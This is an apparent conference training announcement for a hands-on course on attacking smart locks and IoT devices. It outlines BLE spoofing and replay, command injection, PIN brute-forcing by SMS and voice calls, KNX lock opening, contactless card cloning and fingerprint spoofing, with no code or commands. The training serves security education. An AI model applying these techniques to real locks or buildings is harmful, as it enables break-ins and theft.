Appsec EU Training

Smart lockpicking - hands-on exploiting software flaws in IoT


Appsec EU

There is no doubt electronic locks are among the most profitable smart devices to attack. And yet recent disclosures of multiple vulnerabilities clearly show there are not enough specialists able to help with software-related issues to so-far mostly hardware vendors.

This course is intended to fill this skills gap. Based on hands-on exercises with real devices (we will have fun hacking a dozen various smart locks), you will learn how to analyse their security and design them properly. The knowledge will then apply to many other IoT devices.

We will perform: wireless sniffing, spoofing, cloning, replay, DoS, authentication and command-injection attacks. Practical exercises will include investigating proprietary network protocols, demystifying and breaking “military grade encryption”, abusing excessive services, triggering fallback open, brute-forcing PINs via voice calls and attacking building automation systems.

The software activities will be mixed with short entertaining tricks, including opening a lock by a strong magnet, counterfeiting fingerprints in a biometric sensor or opening voice-controlled lock by remotely hacking speaker-enabled devices.

Several tasks will be associated with electromagnetic lock guarding a special vault - full of goods from Poland. Whenever a student will succeed in hacking the lock, the box opens automatically, and one can have something delicious.

Technologies covered will include Bluetooth Smart, Linux embedded, KNX, NFC, Wiegand, WiFi, P2P, GSM…

Each student will receive about 100 EUR value hardware (detailed below).

List of topics:

Bluetooth Smart

based on at least 7 various smart locks, and tools developed by the trainer: GATTacker BLE MITM proxy and deliberately vulnerable Hackmelock (consisting of Android mobile application and lock device simulated on Raspberry Pi):

  • passive sniffing
  • static authentication password
  • spoofing
  • replay attacks
  • command injection
  • Denial of Service
  • cracking “Latest PKI technology”
  • other flaws of custom challenge-response authentication
  • abusing excessive services (e.g. module’s default AT-command interface).
  • weaknesses of key sharing with guests functionality
  • physical hands-on: opening lock with a strong magnet which turns motor inside
  • takeaway Hackmelock challenges for practising later at home using provided hardware

Linux embedded

based on wireless door lock, alarm+home automation system and other devices:

  • authentication bypass
  • information disclosure
  • telnet brute-force
  • OS command injection
  • switching to WiFi maintenance mode using external intercom
  • UART interfaces introduction

Proprietary network protocols

based on fingerprint sensor device, wireless door lock, HVAC controller

  • various approaches to analysing proprietary protocols
  • step-by-step understanding packets and attacking remote management binary communication of fingerprint sensor
  • sniffing and decoding administrative credentials
  • abusing improper session management (authentication bypass)
  • P2P communication - how to attack devices hidden behind NAT
  • a few case-studies of proprietary protocols vulnerabilities identified in financial systems, mobile apps, other devices

KNX home automation -

we will have an example installation connected to electromagnetic lock

  • theory introduction, typical architecture, group address, device address…
  • tools: ETS configuration suite vs open-source knxd, knxmap, nmap scripts
  • how to locate and connect to KNX-IP gateway in LAN or remotely
  • monitor mode - sniffing the bus communication
  • write command to group address and open lock

SMS and DTMF remote control over GSM

based on remote control alarm system

  • theory introduction to GSM interception
  • brute-force alarm administrative PIN via automated remote SMS and voice calls


based on hotel electronic door lock, ski lift pass and a bus ticket

  • clone contactless card
  • brute-force ID


wired access control transmission standard

  • theory introduction
  • sniff the data transmitted from access control reader using BLEKey


you will also be able try for yourself to:

  • open smart lock using special strokes of a strong magnet which turns the device’s inside motor
  • cheat fingerprint biometric sensor - we can make your own fingerprint clone during training
  • open voice-controlled lock by hacking nearby speaker-enabled device

We will also have several Mirai-vulnerable cameras and DVR. We will expose them directly to Internet and watch how long it will take for them to be pwned. Having enough time we will analyse the attack online.

Who should come?

Pentesters, security professionals, IoT developers, anyone interested - regardless initial skills level or experience, everybody will learn something new.

What students should bring?

  • contemporary laptop capable of running Kali Linux in virtual machine
  • Android > 4.3 smartphone. If you don’t have one, please inform in advance - a few will be available for students.
  • basic familiarity with Linux command-line, Kali, Wireshark
  • scripting skills or pentesting experience will be an advantage, but is not crucial

What will be provided?

  • course materials in PDFs (several hundred pages)
  • all required additional files: source code, documentation, installation binaries…
  • Bluetooth Smart hardware sniffer and development kit based on nrf51822 module
  • 2 Bluetooth Low Energy USB dongles
  • Raspberry Pi 3 with assessment tools and Hackmelock for further hacking at home
  • NFC NXP PN532 board + “magic UID” card - which will allow you to clone most common Mifare Classic contactless cards


comments powered by Disqus